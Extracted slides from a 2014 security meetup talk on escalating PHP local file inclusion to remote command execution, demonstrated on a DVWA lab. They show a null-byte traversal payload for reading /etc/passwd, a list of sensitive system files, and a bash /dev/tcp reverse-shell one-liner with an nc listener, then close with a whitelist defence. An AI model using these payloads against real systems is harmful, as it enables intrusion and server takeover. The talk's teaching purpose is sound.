null Bangalore Chapter - March 2014 Meet

1. Local File Inclusion To Remote
Command Execution [LFI <> RCE]
By
Sharath Unni

2. Introduction
 What is a file inclusion vulnerability?
 How the attack works?
 RFI/LFI vulnerable PHP functions
 Traverse and read local files
 PathTraversal / FI using scanners
 Reverse shell via LFI
 Other ways to inject your code
 Defending yourself

3. What is a file inclusion vulnerability?
 Input validation
 The application trusts/doesn’t validate the user input
 The code includes/imports other pages
 Dynamic including of the page
 When PHP includes a file it will parse any PHP code within
that file (“<?php” and “?>”)
Do not trust the user…ever !!

4. How the attack works?
http://192.168.109.136/dvwa/vulnerabilities/fi/?page=include
The code would be:
<?php $file =$_GET[‘file'];
include("/".$file .".php"); <--Vulnerable !!
?>
 Assign page to "../../../../etc/passwd%00“
<?php $file =$_GET[‘file'];
include("/../../../../etc/passwd%00.php"); <-- Directory Traversal to LFI ?>
%00 (Null CHAR) will ignore everything that comes after %00
../../../ will traverse path to root and goto /etc/passwd

5. RFI/LFI vulnerable PHP functions
include()
include_once()
require()
require_once()
fopen()

6. Common locations
 Normally, the following files are read:
/etc/passwd
/etc/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/httpd/conf/httpd.conf
 Other Unix common locations

7. Path Traversal / FI using scanners
http://sectooladdict.blogspot.in/ OR http://sectoolmarket.com/

8. We read the files,
what next?

9. Reverse shell via LFI
 PHP script to open an outbound TCP connection
<?php exec("bash -i >& /dev/tcp/<yourIP>/<port> 0>&1"); ?>
 Go and catch the reverse shell
nc –lp <port>

10. Other ways to inject your code
 Using directory traversal to read files
 Log poisoning (access.log, error.log)
 Session variables
 Uploaded files
 Emails
 Shared hosting
 FTP and other logs

11. Defending yourself
 <?php
 $page_files=array( 'about'=>'about.html',
 'photos'=>'photos.html',
 'contact'=>'contact.html',
 'home'=>'home.html'
 );

 if (in_array($_GET['page'],array_keys($page_files))) {
 include $page_files[$_GET['page']];
 } else {
 include $page_files['home'];
 }
 ?>

12. Thank You! 

13. References
 http://sectoolmarket.com/path-traversal-local-file-
inclusion-detection-accuracy-of-open-source-web-
application-scanners.html